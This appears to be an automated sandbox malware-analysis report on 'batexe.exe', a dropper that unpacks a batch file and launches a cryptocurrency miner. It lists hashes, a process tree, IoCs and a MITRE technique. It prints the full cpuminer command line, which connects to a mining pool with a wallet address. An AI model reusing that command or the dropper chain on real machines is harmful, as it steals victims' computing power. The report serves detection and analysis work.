73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4716	b2e.exe
3304	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3304	cpuminer-sse2.exe
3304	cpuminer-sse2.exe
3304	cpuminer-sse2.exe
3304	cpuminer-sse2.exe
3304	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2564-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 4716	2564	batexe.exe	73
PID 2564 wrote to memory of 4716	2564	batexe.exe	73
PID 2564 wrote to memory of 4716	2564	batexe.exe	73
PID 4716 wrote to memory of 312	4716	b2e.exe	74
PID 4716 wrote to memory of 312	4716	b2e.exe	74
PID 4716 wrote to memory of 312	4716	b2e.exe	74
PID 312 wrote to memory of 3304	312	cmd.exe	77
PID 312 wrote to memory of 3304	312	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ECE0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:312
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\b2e.exe

Filesize
10.9MB

MD5
ac3a9a4685d161b272440b0f08b2dc69

SHA1
74971bf8e20bc4165e0362ab85efa624a900f26a

SHA256
e3bb6966464dfa5a795d7377c4d0a5de8b21615e1f71f7627ccd37c7db7abb8b

SHA512
a66cc69285393992cce82eb92c2fa7850f33408a7e9cbba21785d875d3eabda6059139a6f9095de9ae96e348c196c793106b9a0e1eeccfa41e65ab5a23da85b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\b2e.exe

Filesize
9.0MB

MD5
b4b19cb639b6d67fbfc07c52c6346fde

SHA1
20f6302f57a579d48ef7cb7a452fb314e5dac03c

SHA256
0b58357ad712c7f79812b5b439d9c4200fe4c143aa9b91df2b3b3d2dbfa7aaca

SHA512
49de30bf60d99076874da8713eaec914b6607ad0cbc4e51af400af98ac9901f3cfade6aa2ded0f41eb5a2014c29580c0b47e155e7c9774db62687583d73dba00

Download Submit
C:\Users\Admin\AppData\Local\Temp\ECE0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
532KB

MD5
7813f2453ea1cf4e56b7e1415fe2a99a

SHA1
644cfdd0b850a0eec4a51c9b959e9155796d4e75

SHA256
80c6cf6a57a58d829a80cb072951e2e000cf55d98b726c02a4a221d0346208fa

SHA512
23c0681b255925868a129a468f9f1828b678a23641bbb543e9ced5eb447545af643240c6869ff6270249d9c7a797cc17a1abd8c4fb6c7332eb237a9c02941648

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
787KB

MD5
40313e7a1342015fd909dd55dc1b1d89

SHA1
27ad9355cf8a8c9ce1f54e9be480eb117d7917cc

SHA256
3e4474407e3b5f00756b9649372eba19bfa532eb6e5a0dac1462036904e55fff

SHA512
505e430880b2596fc7873c880042d51d536f53053cb8ddf4e0058483640957e3d3698e21ee20142d71e5ca3fd33f7d8447897289bf90def7b251d452201bd1f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
536KB

MD5
41f212792d170836a6878082d376c8b0

SHA1
4bd1a7b5d9ac893aba694113edced1af67b20628

SHA256
438c7a6fe5e21dee7378dbee50e049709e30782678bf7c413ba9c8ebda4e43c1

SHA512
7ee3bf8b18b3c08dacfbedaef140935553bcfd6dc92d96ec461f1f43a954c23e02c92aea5ec0b1311b25116ef38884157eddd436c2f311b509bfbc19cd7d170c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
392KB

MD5
7a8a44f22ccad33ee44dc75077153590

SHA1
372fbea6c2145ebad0a0e4051772e9592457d86e

SHA256
fa7e8aba9b55da5c294353e63d6c9de0b1ac80b34316eb9969c4446b38e4b4dd

SHA512
70a3560d262312c030c3143c01cfc762a7810456cd5baa22ac2952c5d2331a43aa454caa3db15efa3597cff8b0a972a7f71f5c07f8f96609f33b9656c48c38db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
557KB

MD5
6d27fc82b1090290fe232c52fba37ad6

SHA1
103cccc3d8eecca5baef578784338f0564f6bf22

SHA256
767fa51b9d6e8021eb4bfca521777ac81488fcf4d18e2ff30ee5394892c3c2ed

SHA512
3ce38763afaab90c22a9be05309be1d706a816aecab93db20cd81e325edce0d32c07cc09891750f665a8ce7033d1a6974e74a8ba3696a1d412288194e1bdfcd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
513KB

MD5
80ceaf1149cc127c07943521f4c56569

SHA1
f1b9cdf17256c589234cf8645e94c81dd1bfa6bd

SHA256
92bb0cffbc29d4bac7a5688f27cb7260b83f1be971b8bcafbebf92a765d5915f

SHA512
3059ece711647bf506509cfdba63ad642d09ab95604b30ecce90d21aa174435736946d1e9d0b27775935ac058b014dfd84715cba6610e307c16c81042d78b15c

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
383KB

MD5
6e1427a26a65813a03e4c11ef8c059f0

SHA1
416bf45e83d293b164697a9ad401e699d2c828d8

SHA256
d45f1f5fb36581ed165602b41ea94a154c2c0db097c65c7398ef366b1db68327

SHA512
2af24626f69ca9011d30e14888164ec5f503a4fbeb447562d7b740dd1fb72d943b063d5954b661f30a06436dd6c7479b3260e8547adfb416fec69e1700cd1195

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
570KB

MD5
1c06908f7e809ccbaf7f78ffbb9bd0a7

SHA1
3e44f8b0be4b2964735c6d457d56594083598e81

SHA256
cf9e7dbd6ba9177f2d09095eb28bbed709c45b155049c9e5d9029cc4edf988e1

SHA512
97f4fcc63acf40ffcca7a2b12708f3dccf1c6312a12b53a5fc945daec820b9c0787af9fc087ff86f98a88a6bdd94c3236c3182b905742cf27ce6e5b5f9b3c5b3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
294KB

MD5
5c5eda1feb0f0d1224b4b405fc92d2f6

SHA1
d048fd79130396d2bd8dd5f266a8964783805849

SHA256
f903339142b844f6b1e918668e02a6ff3dd7d28aa24d7c705c22a1d411a104ca

SHA512
0692e1ef3f22acfd9676b9fbdc977a126bd3c93db5e82e2aa68e194216cb419ae5201b5b3124e674e0002dfc47e10d3221c6719c0c61cdc5d250d789ae895f71

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
369KB

MD5
341a9f6baa72c19c3db67585045a79bf

SHA1
c05aa5c903379ab4adc8242fff72eb1ff476c39b

SHA256
b924ac218babe0cc89eb2b6ca66837972347014f1389c7186d4d969d16bff13b

SHA512
ff2c2b4be61a1276841fb8634e3114500f6c99939727c18e2c066c1539de1a9e011ed4984f8581adc02ca3d4b84e6125a5056571d208d32c7b54949aaf6160d8

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
243KB

MD5
83a0276b9bf8286d2fccf4796fffaef3

SHA1
db77436bdea38e5e7671c8a34fa6b440b0ecda0d

SHA256
2f24671e6aceb02a1638c5f81acfff7c341bb1d53029dfe89f655ef2f18204eb

SHA512
5c9367dc2ebfa39bc8f016be8536c2e7a9fe0817c0a9008e09c1a0b5f356377193cfe0eff7680ab20c36b314d5778b7e7dbb2048566c5b91de7fd0c6eaa09ae4

Download Submit
memory/2564-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3304-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3304-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-43-0x0000000074110000-0x00000000741A8000-memory.dmp

Filesize
608KB

Download
memory/3304-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3304-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3304-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3304-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4716-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4716-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download